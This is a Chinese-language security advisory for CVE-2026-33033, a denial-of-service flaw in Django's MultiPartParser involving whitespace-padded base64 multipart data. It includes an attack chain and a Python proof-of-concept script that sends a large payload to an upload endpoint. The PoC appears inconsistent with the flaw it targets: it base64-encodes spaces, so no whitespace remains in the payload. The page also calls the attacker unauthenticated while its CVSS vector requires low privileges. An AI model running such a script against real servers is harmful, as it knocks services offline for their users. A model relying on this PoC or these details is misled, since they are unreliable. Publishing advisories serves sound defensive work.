CVE-2026-33033 CVSS 6.5 中危

CVE-2026-33033 Django拒绝服务漏洞

披露日期: 2026-04-07

来源: 6a34fbeb-21d4-45e7-8e0a-62b95bc12c92

漏洞信息

漏洞编号

CVE-2026-33033

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Django

漏洞概述

该漏洞存在于 Django 的 MultiPartParser 组件中。未经身份验证的远程攻击者可以通过发送特制的恶意 multipart/form-data 请求，利用 Content-Transfer-Encoding: base64 编码并填充大量空格，触发服务器在解析过程中的性能退化。这可能导致服务器资源耗尽，从而引发拒绝服务攻击。主要影响 Django 6.0、5.2 和 4.2 的特定旧版本。

技术细节

该漏洞的核心在于 Django `MultiPartParser` 对 Base64 编码数据的处理机制。在解析 HTTP 请求时，如果字段包含 `Content-Transfer-Encoding: base64`，Django 会尝试对其进行解码。然而，解析器未能有效处理包含大量空格的 Base64 流。攻击者可以构造一个恶意的 HTTP POST 请求，其中 multipart 数据包含经过 Base64 编码但填充了大量空白字符的字段。当服务器尝试处理这些数据时，由于空格的验证和处理逻辑效率低下，会导致 CPU 使用率飙升或内存占用急剧增加。这种性能退化攻击利用了算法复杂度上的缺陷，使得攻击者能够以极小的网络带宽消耗，长期占用服务器资源，最终导致合法用户无法访问服务，形成拒绝服务状态。

攻击链分析

STEP 1

侦察

攻击者识别目标服务器是否运行受影响的 Django 版本（6.0.4前、5.2.13前或4.2.30前）。

STEP 2

武器化

攻击者编写脚本生成包含大量空白字符的数据，并对其进行 Base64 编码，构造带有 Content-Transfer-Encoding: base64 头部的恶意 multipart 请求。

STEP 3

投递

攻击者向目标服务器的文件上传接口或接受 multipart 数据的端点发送特制的 HTTP POST 请求。

STEP 4

利用

Django 的 MultiPartParser 解析该请求时，由于处理 Base64 流中空格的效率问题，导致服务器 CPU 或内存资源被大量占用。

STEP 5

影响

服务器性能显著下降，无法及时响应其他合法用户的请求，导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (replace with actual vulnerable endpoint)
target_url = "http://localhost:8000/upload/"

# Prepare a large payload with whitespace to trigger the performance degradation
# The description mentions 'Content-Transfer-Encoding: base64 including excessive whitespace'
# We simulate this by sending a file part with the specific encoding header.

# Create a large string of spaces
whitespace_payload = b" " * 1000000  # 1MB of spaces

# Encode to base64 as implied by the vulnerability description
import base64
encoded_payload = base64.b64encode(whitespace_payload)

files = {
    'file': ('exploit.txt', encoded_payload, 'text/plain', {
        'Content-Transfer-Encoding': 'base64'
    })
}

data = {
    'description': 'DoS test payload'
}

try:
    print(f"Sending payload to {target_url}...")
    response = requests.post(target_url, files=files, data=data)
    print(f"Response status code: {response.status_code}")
except Exception as e:
    print(f"Error during request: {e}")

影响范围

Django 6.0 < 6.0.4

Django 5.2 < 5.2.13

Django 4.2 < 4.2.30

Django 5.0.x (可能受影响)

Django 4.1.x (可能受影响)

Django 3.2.x (可能受影响)

防御指南

临时缓解措施

建议立即升级至官方发布的修复版本。若暂时无法升级，可通过配置 Web 应用防火墙（WAF）拦截或限制带有 `Content-Transfer-Encoding: base64` 的 multipart 请求，或者临时禁用非必要的文件上传功能，以降低被攻击风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表